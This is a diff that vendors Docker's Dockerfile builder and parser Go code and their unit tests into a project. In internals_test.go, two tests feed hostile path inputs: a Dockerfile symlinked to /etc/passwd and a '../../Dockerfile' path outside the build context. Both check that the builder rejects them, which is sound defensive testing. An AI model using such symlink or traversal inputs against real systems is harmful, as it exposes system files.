+func (b *Builder) isBuildArgAllowed(arg string) bool { + if _, ok := BuiltinAllowedBuildArgs[arg]; ok { + return true + } + if _, ok := b.allowedBuildArgs[arg]; ok { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go new file mode 100644 index 0000000000..d170d8e25a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go @@ -0,0 +1,95 @@ +package dockerfile + +import ( + "fmt" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/archive" +) + +func TestEmptyDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + createTestTempFile(t, contextDir, builder.DefaultDockerfileName, "", 0777) + + readAndCheckDockerfile(t, "emptyDockefile", contextDir, "", "The Dockerfile (Dockerfile) cannot be empty") +} + +func TestSymlinkDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + createTestSymlink(t, contextDir, builder.DefaultDockerfileName, "/etc/passwd") + + // The reason the error is "Cannot locate specified Dockerfile" is because + // in the builder, the symlink is resolved within the context, therefore + // Dockerfile -> /etc/passwd becomes etc/passwd from the context which is + // a nonexistent file. 
+ expectedError := fmt.Sprintf("Cannot locate specified Dockerfile: %s", builder.DefaultDockerfileName) + + readAndCheckDockerfile(t, "symlinkDockerfile", contextDir, builder.DefaultDockerfileName, expectedError) +} + +func TestDockerfileOutsideTheBuildContext(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + expectedError := "Forbidden path outside the build context" + + readAndCheckDockerfile(t, "DockerfileOutsideTheBuildContext", contextDir, "../../Dockerfile", expectedError) +} + +func TestNonExistingDockerfile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test") + defer cleanup() + + expectedError := "Cannot locate specified Dockerfile: Dockerfile" + + readAndCheckDockerfile(t, "NonExistingDockerfile", contextDir, "Dockerfile", expectedError) +} + +func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath, expectedError string) { + tarStream, err := archive.Tar(contextDir, archive.Uncompressed) + + if err != nil { + t.Fatalf("Error when creating tar stream: %s", err) + } + + defer func() { + if err = tarStream.Close(); err != nil { + t.Fatalf("Error when closing tar stream: %s", err) + } + }() + + context, err := builder.MakeTarSumContext(tarStream) + + if err != nil { + t.Fatalf("Error when creating tar context: %s", err) + } + + defer func() { + if err = context.Close(); err != nil { + t.Fatalf("Error when closing tar context: %s", err) + } + }() + + options := &types.ImageBuildOptions{ + Dockerfile: dockerfilePath, + } + + b := &Builder{options: options, context: context} + + err = b.readDockerfile() + + if err == nil { + t.Fatalf("No error when executing test: %s", testName) + } + + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("Wrong error message. Should be \"%s\". 
Got \"%s\"", expectedError, err.Error()) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go new file mode 100644 index 0000000000..a8a47c3582 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go @@ -0,0 +1,38 @@ +// +build !windows + +package dockerfile + +import ( + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/system" +) + +// normaliseDest normalises the destination of a COPY/ADD command in a +// platform semantically consistent way. +func normaliseDest(cmdName, workingDir, requested string) (string, error) { + dest := filepath.FromSlash(requested) + endsInSlash := strings.HasSuffix(requested, string(os.PathSeparator)) + if !system.IsAbs(requested) { + dest = filepath.Join(string(os.PathSeparator), filepath.FromSlash(workingDir), dest) + // Make sure we preserve any trailing slash + if endsInSlash { + dest += string(os.PathSeparator) + } + } + return dest, nil +} + +func containsWildcards(name string) bool { + for i := 0; i < len(name); i++ { + ch := name[i] + if ch == '\\' { + i++ + } else if ch == '*' || ch == '?' || ch == '[' { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go new file mode 100644 index 0000000000..f60b112049 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go @@ -0,0 +1,66 @@ +package dockerfile + +import ( + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/system" +) + +// normaliseDest normalises the destination of a COPY/ADD command in a +// platform semantically consistent way. 
+func normaliseDest(cmdName, workingDir, requested string) (string, error) { + dest := filepath.FromSlash(requested) + endsInSlash := strings.HasSuffix(dest, string(os.PathSeparator)) + + // We are guaranteed that the working directory is already consistent, + // However, Windows also has, for now, the limitation that ADD/COPY can + // only be done to the system drive, not any drives that might be present + // as a result of a bind mount. + // + // So... if the path requested is Linux-style absolute (/foo or \\foo), + // we assume it is the system drive. If it is a Windows-style absolute + // (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we + // strip any configured working directories drive letter so that it + // can be subsequently legitimately converted to a Windows volume-style + // pathname. + + // Not a typo - filepath.IsAbs, not system.IsAbs on this next check as + // we only want to validate where the DriveColon part has been supplied. + if filepath.IsAbs(dest) { + if strings.ToUpper(string(dest[0])) != "C" { + return "", fmt.Errorf("Windows does not support %s with a destinations not on the system drive (C:)", cmdName) + } + dest = dest[2:] // Strip the drive letter + } + + // Cannot handle relative where WorkingDir is not the system drive. 
+ if len(workingDir) > 0 { + if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) { + return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir) + } + if !system.IsAbs(dest) { + if string(workingDir[0]) != "C" { + return "", fmt.Errorf("Windows does not support %s with relative paths when WORKDIR is not the system drive", cmdName) + } + dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest) + // Make sure we preserve any trailing slash + if endsInSlash { + dest += string(os.PathSeparator) + } + } + } + return dest, nil +} + +func containsWildcards(name string) bool { + for i := 0; i < len(name); i++ { + ch := name[i] + if ch == '*' || ch == '?' || ch == '[' { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go new file mode 100644 index 0000000000..868a6671a3 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go @@ -0,0 +1,51 @@ +// +build windows + +package dockerfile + +import "testing" + +func TestNormaliseDest(t *testing.T) { + tests := []struct{ current, requested, expected, etext string }{ + {``, `D:\`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`}, + {``, `e:/`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`}, + {`invalid`, `./c1`, ``, `Current WorkingDir invalid is not platform consistent`}, + {`C:`, ``, ``, `Current WorkingDir C: is not platform consistent`}, + {`C`, ``, ``, `Current WorkingDir C is not platform consistent`}, + {`D:\`, `.`, ``, "Windows does not support TEST with relative paths when WORKDIR is not the system drive"}, + {``, `D`, `D`, ``}, + {``, `./a1`, `.\a1`, ``}, + {``, `.\b1`, `.\b1`, ``}, + {``, `/`, `\`, ``}, + {``, `\`, `\`, ``}, + {``, `c:/`, `\`, ``}, + {``, `c:\`, `\`, ``}, + {``, 
`.`, `.`, ``}, + {`C:\wdd`, `./a1`, `\wdd\a1`, ``}, + {`C:\wde`, `.\b1`, `\wde\b1`, ``}, + {`C:\wdf`, `/`, `\`, ``}, + {`C:\wdg`, `\`, `\`, ``}, + {`C:\wdh`, `c:/`, `\`, ``}, + {`C:\wdi`, `c:\`, `\`, ``}, + {`C:\wdj`, `.`, `\wdj`, ``}, + {`C:\wdk`, `foo/bar`, `\wdk\foo\bar`, ``}, + {`C:\wdl`, `foo\bar`, `\wdl\foo\bar`, ``}, + {`C:\wdm`, `foo/bar/`, `\wdm\foo\bar\`, ``}, + {`C:\wdn`, `foo\bar/`, `\wdn\foo\bar\`, ``}, + } + for _, i := range tests { + got, err := normaliseDest("TEST", i.current, i.requested) + if err != nil && i.etext == "" { + t.Fatalf("TestNormaliseDest Got unexpected error %q for %s %s. ", err.Error(), i.current, i.requested) + } + if i.etext != "" && ((err == nil) || (err != nil && err.Error() != i.etext)) { + if err == nil { + t.Fatalf("TestNormaliseDest Expected an error for %s %s but didn't get one", i.current, i.requested) + } else { + t.Fatalf("TestNormaliseDest Wrong error text for %s %s - %s", i.current, i.requested, err.Error()) + } + } + if i.etext == "" && got != i.expected { + t.Fatalf("TestNormaliseDest Expected %q for %q and %q. 
Got %q", i.expected, i.current, i.requested, got) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go new file mode 100644 index 0000000000..fff3046fd3 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go @@ -0,0 +1,36 @@ +package main + +import ( + "fmt" + "os" + + "github.com/docker/docker/builder/dockerfile/parser" +) + +func main() { + var f *os.File + var err error + + if len(os.Args) < 2 { + fmt.Println("please supply filename(s)") + os.Exit(1) + } + + for _, fn := range os.Args[1:] { + f, err = os.Open(fn) + if err != nil { + panic(err) + } + defer f.Close() + + d := parser.Directive{LookingForDirectives: true} + parser.SetEscapeToken(parser.DefaultEscapeToken, &d) + + ast, err := parser.Parse(f, &d) + if err != nil { + panic(err) + } else { + fmt.Println(ast.Dump()) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go new file mode 100644 index 0000000000..60d74d9c36 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go @@ -0,0 +1,61 @@ +package parser + +import ( + "testing" +) + +var invalidJSONArraysOfStrings = []string{ + `["a",42,"b"]`, + `["a",123.456,"b"]`, + `["a",{},"b"]`, + `["a",{"c": "d"},"b"]`, + `["a",["c"],"b"]`, + `["a",true,"b"]`, + `["a",false,"b"]`, + `["a",null,"b"]`, +} + +var validJSONArraysOfStrings = map[string][]string{ + `[]`: {}, + `[""]`: {""}, + `["a"]`: {"a"}, + `["a","b"]`: {"a", "b"}, + `[ "a", "b" ]`: {"a", "b"}, + `[ "a", "b" ]`: {"a", "b"}, + ` [ "a", "b" ] `: {"a", "b"}, + `["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"]`: {"abc 123", "♥", "☃", "\" \\ / \b \f \n \r \t \u0000"}, +} + +func TestJSONArraysOfStrings(t *testing.T) { + for json, expected := range validJSONArraysOfStrings { + d := Directive{} + 
SetEscapeToken(DefaultEscapeToken, &d) + + if node, _, err := parseJSON(json, &d); err != nil { + t.Fatalf("%q should be a valid JSON array of strings, but wasn't! (err: %q)", json, err) + } else { + i := 0 + for node != nil { + if i >= len(expected) { + t.Fatalf("expected result is shorter than parsed result (%d vs %d+) in %q", len(expected), i+1, json) + } + if node.Value != expected[i] { + t.Fatalf("expected %q (not %q) in %q at pos %d", expected[i], node.Value, json, i) + } + node = node.Next + i++ + } + if i != len(expected) { + t.Fatalf("expected result is longer than parsed result (%d vs %d) in %q", len(expected), i+1, json) + } + } + } + for _, json := range invalidJSONArraysOfStrings { + d := Directive{} + SetEscapeToken(DefaultEscapeToken, &d) + + if _, _, err := parseJSON(json, &d); err != errDockerfileNotStringArray { + t.Fatalf("%q should be an invalid JSON array of strings, but wasn't!", json) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go new file mode 100644 index 0000000000..d2bf2b01b1 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go @@ -0,0 +1,361 @@ +package parser + +// line parsers are dispatch calls that parse a single unit of text into a +// Node object which contains the whole statement. Dockerfiles have varied +// (but not usually unique, see ONBUILD for a unique example) parsing rules +// per-command, and these unify the processing in a way that makes it +// manageable. + +import ( + "encoding/json" + "errors" + "fmt" + "strings" + "unicode" + "unicode/utf8" +) + +var ( + errDockerfileNotStringArray = errors.New("When using JSON array syntax, arrays must be comprised of strings only.") +) + +// ignore the current argument. This will still leave a command parsed, but +// will not incorporate the arguments into the ast. 
+func parseIgnore(rest string, d *Directive) (*Node, map[string]bool, error) { + return &Node{}, nil, nil +} + +// used for onbuild. Could potentially be used for anything that represents a +// statement with sub-statements. +// +// ONBUILD RUN foo bar -> (onbuild (run foo bar)) +// +func parseSubCommand(rest string, d *Directive) (*Node, map[string]bool, error) { + if rest == "" { + return nil, nil, nil + } + + _, child, err := ParseLine(rest, d, false) + if err != nil { + return nil, nil, err + } + + return &Node{Children: []*Node{child}}, nil, nil +} + +// helper to parse words (i.e space delimited or quoted strings) in a statement. +// The quotes are preserved as part of this function and they are stripped later +// as part of processWords(). +func parseWords(rest string, d *Directive) []string { + const ( + inSpaces = iota // looking for start of a word + inWord + inQuote + ) + + words := []string{} + phase := inSpaces + word := "" + quote := '\000' + blankOK := false + var ch rune + var chWidth int + + for pos := 0; pos <= len(rest); pos += chWidth { + if pos != len(rest) { + ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) + } + + if phase == inSpaces { // Looking for start of word + if pos == len(rest) { // end of input + break + } + if unicode.IsSpace(ch) { // skip spaces + continue + } + phase = inWord // found it, fall through + } + if (phase == inWord || phase == inQuote) && (pos == len(rest)) { + if blankOK || len(word) > 0 { + words = append(words, word) + } + break + } + if phase == inWord { + if unicode.IsSpace(ch) { + phase = inSpaces + if blankOK || len(word) > 0 { + words = append(words, word) + } + word = "" + blankOK = false + continue + } + if ch == '\'' || ch == '"' { + quote = ch + blankOK = true + phase = inQuote + } + if ch == d.EscapeToken { + if pos+chWidth == len(rest) { + continue // just skip an escape token at end of line + } + // If we're not quoted and we see an escape token, then always just + // add the escape token plus the 
char to the word, even if the char + // is a quote. + word += string(ch) + pos += chWidth + ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) + } + word += string(ch) + continue + } + if phase == inQuote { + if ch == quote { + phase = inWord + } + // The escape token is special except for ' quotes - can't escape anything for ' + if ch == d.EscapeToken && quote != '\'' { + if pos+chWidth == len(rest) { + phase = inWord + continue // just skip the escape token at end + } + pos += chWidth + word += string(ch) + ch, chWidth = utf8.DecodeRuneInString(rest[pos:]) + } + word += string(ch) + } + } + + return words +} + +// parse environment like statements. Note that this does *not* handle +// variable interpolation, which will be handled in the evaluator. +func parseNameVal(rest string, key string, d *Directive) (*Node, map[string]bool, error) { + // This is kind of tricky because we need to support the old + // variant: KEY name value + // as well as the new one: KEY name=value ... + // The trigger to know which one is being used will be whether we hit + // a space or = first. space ==> old, "=" ==> new + + words := parseWords(rest, d) + if len(words) == 0 { + return nil, nil, nil + } + + var rootnode *Node + + // Old format (KEY name value) + if !strings.Contains(words[0], "=") { + node := &Node{} + rootnode = node + strs := tokenWhitespace.Split(rest, 2) + + if len(strs) < 2 { + return nil, nil, fmt.Errorf(key + " must have two arguments") + } + + node.Value = strs[0] + node.Next = &Node{} + node.Next.Value = strs[1] + } else { + var prevNode *Node + for i, word := range words { + if !strings.Contains(word, "=") { + return nil, nil, fmt.Errorf("Syntax error - can't find = in %q. 
Must be of the form: name=value", word) + } + parts := strings.SplitN(word, "=", 2) + + name := &Node{} + value := &Node{} + + name.Next = value + name.Value = parts[0] + value.Value = parts[1] + + if i == 0 { + rootnode = name + } else { + prevNode.Next = name + } + prevNode = value + } + } + + return rootnode, nil, nil +} + +func parseEnv(rest string, d *Directive) (*Node, map[string]bool, error) { + return parseNameVal(rest, "ENV", d) +} + +func parseLabel(rest string, d *Directive) (*Node, map[string]bool, error) { + return parseNameVal(rest, "LABEL", d) +} + +// parses a statement containing one or more keyword definition(s) and/or +// value assignments, like `name1 name2= name3="" name4=value`. +// Note that this is a stricter format than the old format of assignment, +// allowed by parseNameVal(), in a way that this only allows assignment of the +// form `keyword=[]` like `name2=`, `name3=""`, and `name4=value` above. +// In addition, a keyword definition alone is of the form `keyword` like `name1` +// above. And the assignments `name2=` and `name3=""` are equivalent and +// assign an empty value to the respective keywords. +func parseNameOrNameVal(rest string, d *Directive) (*Node, map[string]bool, error) { + words := parseWords(rest, d) + if len(words) == 0 { + return nil, nil, nil + } + + var ( + rootnode *Node + prevNode *Node + ) + for i, word := range words { + node := &Node{} + node.Value = word + if i == 0 { + rootnode = node + } else { + prevNode.Next = node + } + prevNode = node + } + + return rootnode, nil, nil +} + +// parses a whitespace-delimited set of arguments. The result is effectively a +// linked list of string arguments. 
+func parseStringsWhitespaceDelimited(rest string, d *Directive) (*Node, map[string]bool, error) { + if rest == "" { + return nil, nil, nil + } + + node := &Node{} + rootnode := node + prevnode := node + for _, str := range tokenWhitespace.Split(rest, -1) { // use regexp + prevnode = node + node.Value = str + node.Next = &Node{} + node = node.Next + } + + // XXX to get around regexp.Split *always* providing an empty string at the + // end due to how our loop is constructed, nil out the last node in the + // chain. + prevnode.Next = nil + + return rootnode, nil, nil +} + +// parsestring just wraps the string in quotes and returns a working node. +func parseString(rest string, d *Directive) (*Node, map[string]bool, error) { + if rest == "" { + return nil, nil, nil + } + n := &Node{} + n.Value = rest + return n, nil, nil +} + +// parseJSON converts JSON arrays to an AST. +func parseJSON(rest string, d *Directive) (*Node, map[string]bool, error) { + rest = strings.TrimLeftFunc(rest, unicode.IsSpace) + if !strings.HasPrefix(rest, "[") { + return nil, nil, fmt.Errorf(`Error parsing "%s" as a JSON array`, rest) + } + + var myJSON []interface{} + if err := json.NewDecoder(strings.NewReader(rest)).Decode(&myJSON); err != nil { + return nil, nil, err + } + + var top, prev *Node + for _, str := range myJSON { + s, ok := str.(string) + if !ok { + return nil, nil, errDockerfileNotStringArray + } + + node := &Node{Value: s} + if prev == nil { + top = node + } else { + prev.Next = node + } + prev = node + } + + return top, map[string]bool{"json": true}, nil +} + +// parseMaybeJSON determines if the argument appears to be a JSON array. If +// so, passes to parseJSON; if not, quotes the result and returns a single +// node. 
+func parseMaybeJSON(rest string, d *Directive) (*Node, map[string]bool, error) { + if rest == "" { + return nil, nil, nil + } + + node, attrs, err := parseJSON(rest, d) + + if err == nil { + return node, attrs, nil + } + if err == errDockerfileNotStringArray { + return nil, nil, err + } + + node = &Node{} + node.Value = rest + return node, nil, nil +} + +// parseMaybeJSONToList determines if the argument appears to be a JSON array. If +// so, passes to parseJSON; if not, attempts to parse it as a whitespace +// delimited string. +func parseMaybeJSONToList(rest string, d *Directive) (*Node, map[string]bool, error) { + node, attrs, err := parseJSON(rest, d) + + if err == nil { + return node, attrs, nil + } + if err == errDockerfileNotStringArray { + return nil, nil, err + } + + return parseStringsWhitespaceDelimited(rest, d) +} + +// The HEALTHCHECK command is like parseMaybeJSON, but has an extra type argument. +func parseHealthConfig(rest string, d *Directive) (*Node, map[string]bool, error) { + // Find end of first argument + var sep int + for ; sep < len(rest); sep++ { + if unicode.IsSpace(rune(rest[sep])) { + break + } + } + next := sep + for ; next < len(rest); next++ { + if !unicode.IsSpace(rune(rest[next])) { + break + } + } + + if sep == 0 { + return nil, nil, nil + } + + typ := rest[:sep] + cmd, attrs, err := parseMaybeJSON(rest[next:], d) + if err != nil { + return nil, nil, err + } + + return &Node{Value: typ, Next: cmd}, attrs, err +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go new file mode 100644 index 0000000000..e534644491 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go @@ -0,0 +1,221 @@ +// Package parser implements a parser and parse tree dumper for Dockerfiles. 
+package parser + +import ( + "bufio" + "bytes" + "fmt" + "io" + "regexp" + "strings" + "unicode" + + "github.com/docker/docker/builder/dockerfile/command" +) + +// Node is a structure used to represent a parse tree. +// +// In the node there are three fields, Value, Next, and Children. Value is the +// current token's string value. Next is always the next non-child token, and +// children contains all the children. Here's an example: +// +// (value next (child child-next child-next-next) next-next) +// +// This data structure is frankly pretty lousy for handling complex languages, +// but lucky for us the Dockerfile isn't very complicated. This structure +// works a little more effectively than a "proper" parse tree for our needs. +// +type Node struct { + Value string // actual content + Next *Node // the next item in the current sexp + Children []*Node // the children of this sexp + Attributes map[string]bool // special attributes for this node + Original string // original line used before parsing + Flags []string // only top Node should have this set + StartLine int // the line in the original dockerfile where the node begins + EndLine int // the line in the original dockerfile where the node ends +} + +// Directive is the structure used during a build run to hold the state of +// parsing directives. 
+type Directive struct { + EscapeToken rune // Current escape token + LineContinuationRegex *regexp.Regexp // Current line contination regex + LookingForDirectives bool // Whether we are currently looking for directives + EscapeSeen bool // Whether the escape directive has been seen +} + +var ( + dispatch map[string]func(string, *Directive) (*Node, map[string]bool, error) + tokenWhitespace = regexp.MustCompile(`[\t\v\f\r ]+`) + tokenEscapeCommand = regexp.MustCompile(`^#[ \t]*escape[ \t]*=[ \t]*(?P.).*$`) + tokenComment = regexp.MustCompile(`^#.*$`) +) + +// DefaultEscapeToken is the default escape token +const DefaultEscapeToken = "\\" + +// SetEscapeToken sets the default token for escaping characters in a Dockerfile. +func SetEscapeToken(s string, d *Directive) error { + if s != "`" && s != "\\" { + return fmt.Errorf("invalid ESCAPE '%s'. Must be ` or \\", s) + } + d.EscapeToken = rune(s[0]) + d.LineContinuationRegex = regexp.MustCompile(`\` + s + `[ \t]*$`) + return nil +} + +func init() { + // Dispatch Table. see line_parsers.go for the parse functions. + // The command is parsed and mapped to the line parser. The line parser + // receives the arguments but not the command, and returns an AST after + // reformulating the arguments according to the rules in the parser + // functions. Errors are propagated up by Parse() and the resulting AST can + // be incorporated directly into the existing AST as a next. 
+ dispatch = map[string]func(string, *Directive) (*Node, map[string]bool, error){ + command.Add: parseMaybeJSONToList, + command.Arg: parseNameOrNameVal, + command.Cmd: parseMaybeJSON, + command.Copy: parseMaybeJSONToList, + command.Entrypoint: parseMaybeJSON, + command.Env: parseEnv, + command.Expose: parseStringsWhitespaceDelimited, + command.From: parseString, + command.Healthcheck: parseHealthConfig, + command.Label: parseLabel, + command.Maintainer: parseString, + command.Onbuild: parseSubCommand, + command.Run: parseMaybeJSON, + command.Shell: parseMaybeJSON, + command.StopSignal: parseString, + command.User: parseString, + command.Volume: parseMaybeJSONToList, + command.Workdir: parseString, + } +} + +// ParseLine parses a line and returns the remainder. +func ParseLine(line string, d *Directive, ignoreCont bool) (string, *Node, error) { + // Handle the parser directive '# escape=. Parser directives must precede + // any builder instruction or other comments, and cannot be repeated. 
+ if d.LookingForDirectives { + tecMatch := tokenEscapeCommand.FindStringSubmatch(strings.ToLower(line)) + if len(tecMatch) > 0 { + if d.EscapeSeen == true { + return "", nil, fmt.Errorf("only one escape parser directive can be used") + } + for i, n := range tokenEscapeCommand.SubexpNames() { + if n == "escapechar" { + if err := SetEscapeToken(tecMatch[i], d); err != nil { + return "", nil, err + } + d.EscapeSeen = true + return "", nil, nil + } + } + } + } + + d.LookingForDirectives = false + + if line = stripComments(line); line == "" { + return "", nil, nil + } + + if !ignoreCont && d.LineContinuationRegex.MatchString(line) { + line = d.LineContinuationRegex.ReplaceAllString(line, "") + return line, nil, nil + } + + cmd, flags, args, err := splitCommand(line) + if err != nil { + return "", nil, err + } + + node := &Node{} + node.Value = cmd + + sexp, attrs, err := fullDispatch(cmd, args, d) + if err != nil { + return "", nil, err + } + + node.Next = sexp + node.Attributes = attrs + node.Original = line + node.Flags = flags + + return "", node, nil +} + +// Parse is the main parse routine. +// It handles an io.ReadWriteCloser and returns the root of the AST. 
+func Parse(rwc io.Reader, d *Directive) (*Node, error) { + currentLine := 0 + root := &Node{} + root.StartLine = -1 + scanner := bufio.NewScanner(rwc) + + utf8bom := []byte{0xEF, 0xBB, 0xBF} + for scanner.Scan() { + scannedBytes := scanner.Bytes() + // We trim UTF8 BOM + if currentLine == 0 { + scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) + } + scannedLine := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace) + currentLine++ + line, child, err := ParseLine(scannedLine, d, false) + if err != nil { + return nil, err + } + startLine := currentLine + + if line != "" && child == nil { + for scanner.Scan() { + newline := scanner.Text() + currentLine++ + + if stripComments(strings.TrimSpace(newline)) == "" { + continue + } + + line, child, err = ParseLine(line+newline, d, false) + if err != nil { + return nil, err + } + + if child != nil { + break + } + } + if child == nil && line != "" { + // When we call ParseLine we'll pass in 'true' for + // the ignoreCont param if we're at the EOF. This will + // prevent the func from returning immediately w/o + // parsing the line thinking that there's more input + // to come. + + _, child, err = ParseLine(line, d, scanner.Err() == nil) + if err != nil { + return nil, err + } + } + } + + if child != nil { + // Update the line information for the current child. + child.StartLine = startLine + child.EndLine = currentLine + // Update the line information for the root. The starting line of the root is always the + // starting line of the first child and the ending line is the ending line of the last child. 
+ if root.StartLine < 0 { + root.StartLine = currentLine + } + root.EndLine = currentLine + root.Children = append(root.Children, child) + } + } + + return root, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go new file mode 100644 index 0000000000..e8e26961de --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go @@ -0,0 +1,173 @@ +package parser + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "testing" +) + +const testDir = "testfiles" +const negativeTestDir = "testfiles-negative" +const testFileLineInfo = "testfile-line/Dockerfile" + +func getDirs(t *testing.T, dir string) []string { + f, err := os.Open(dir) + if err != nil { + t.Fatal(err) + } + + defer f.Close() + + dirs, err := f.Readdirnames(0) + if err != nil { + t.Fatal(err) + } + + return dirs +} + +func TestTestNegative(t *testing.T) { + for _, dir := range getDirs(t, negativeTestDir) { + dockerfile := filepath.Join(negativeTestDir, dir, "Dockerfile") + + df, err := os.Open(dockerfile) + if err != nil { + t.Fatalf("Dockerfile missing for %s: %v", dir, err) + } + defer df.Close() + + d := Directive{LookingForDirectives: true} + SetEscapeToken(DefaultEscapeToken, &d) + _, err = Parse(df, &d) + if err == nil { + t.Fatalf("No error parsing broken dockerfile for %s", dir) + } + } +} + +func TestTestData(t *testing.T) { + for _, dir := range getDirs(t, testDir) { + dockerfile := filepath.Join(testDir, dir, "Dockerfile") + resultfile := filepath.Join(testDir, dir, "result") + + df, err := os.Open(dockerfile) + if err != nil { + t.Fatalf("Dockerfile missing for %s: %v", dir, err) + } + defer df.Close() + + d := Directive{LookingForDirectives: true} + SetEscapeToken(DefaultEscapeToken, &d) + ast, err := Parse(df, &d) + if err != nil { + t.Fatalf("Error parsing %s's dockerfile: %v", dir, err) + } + + content, err := 
ioutil.ReadFile(resultfile) + if err != nil { + t.Fatalf("Error reading %s's result file: %v", dir, err) + } + + if runtime.GOOS == "windows" { + // CRLF --> CR to match Unix behavior + content = bytes.Replace(content, []byte{'\x0d', '\x0a'}, []byte{'\x0a'}, -1) + } + + if ast.Dump()+"\n" != string(content) { + fmt.Fprintln(os.Stderr, "Result:\n"+ast.Dump()) + fmt.Fprintln(os.Stderr, "Expected:\n"+string(content)) + t.Fatalf("%s: AST dump of dockerfile does not match result", dir) + } + } +} + +func TestParseWords(t *testing.T) { + tests := []map[string][]string{ + { + "input": {"foo"}, + "expect": {"foo"}, + }, + { + "input": {"foo bar"}, + "expect": {"foo", "bar"}, + }, + { + "input": {"foo\\ bar"}, + "expect": {"foo\\ bar"}, + }, + { + "input": {"foo=bar"}, + "expect": {"foo=bar"}, + }, + { + "input": {"foo bar 'abc xyz'"}, + "expect": {"foo", "bar", "'abc xyz'"}, + }, + { + "input": {`foo bar "abc xyz"`}, + "expect": {"foo", "bar", `"abc xyz"`}, + }, + { + "input": {"àöû"}, + "expect": {"àöû"}, + }, + { + "input": {`föo bàr "âbc xÿz"`}, + "expect": {"föo", "bàr", `"âbc xÿz"`}, + }, + } + + for _, test := range tests { + d := Directive{LookingForDirectives: true} + SetEscapeToken(DefaultEscapeToken, &d) + words := parseWords(test["input"][0], &d) + if len(words) != len(test["expect"]) { + t.Fatalf("length check failed. input: %v, expect: %q, output: %q", test["input"][0], test["expect"], words) + } + for i, word := range words { + if word != test["expect"][i] { + t.Fatalf("word check failed for word: %q. 
input: %q, expect: %q, output: %q", word, test["input"][0], test["expect"], words) + } + } + } +} + +func TestLineInformation(t *testing.T) { + df, err := os.Open(testFileLineInfo) + if err != nil { + t.Fatalf("Dockerfile missing for %s: %v", testFileLineInfo, err) + } + defer df.Close() + + d := Directive{LookingForDirectives: true} + SetEscapeToken(DefaultEscapeToken, &d) + ast, err := Parse(df, &d) + if err != nil { + t.Fatalf("Error parsing dockerfile %s: %v", testFileLineInfo, err) + } + + if ast.StartLine != 5 || ast.EndLine != 31 { + fmt.Fprintf(os.Stderr, "Wrong root line information: expected(%d-%d), actual(%d-%d)\n", 5, 31, ast.StartLine, ast.EndLine) + t.Fatalf("Root line information doesn't match result.") + } + if len(ast.Children) != 3 { + fmt.Fprintf(os.Stderr, "Wrong number of child: expected(%d), actual(%d)\n", 3, len(ast.Children)) + t.Fatalf("Root line information doesn't match result for %s", testFileLineInfo) + } + expected := [][]int{ + {5, 5}, + {11, 12}, + {17, 31}, + } + for i, child := range ast.Children { + if child.StartLine != expected[i][0] || child.EndLine != expected[i][1] { + t.Logf("Wrong line information for child %d: expected(%d-%d), actual(%d-%d)\n", + i, expected[i][0], expected[i][1], child.StartLine, child.EndLine) + t.Fatalf("Root line information doesn't match result.") + } + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile new file mode 100644 index 0000000000..c7601c9f69 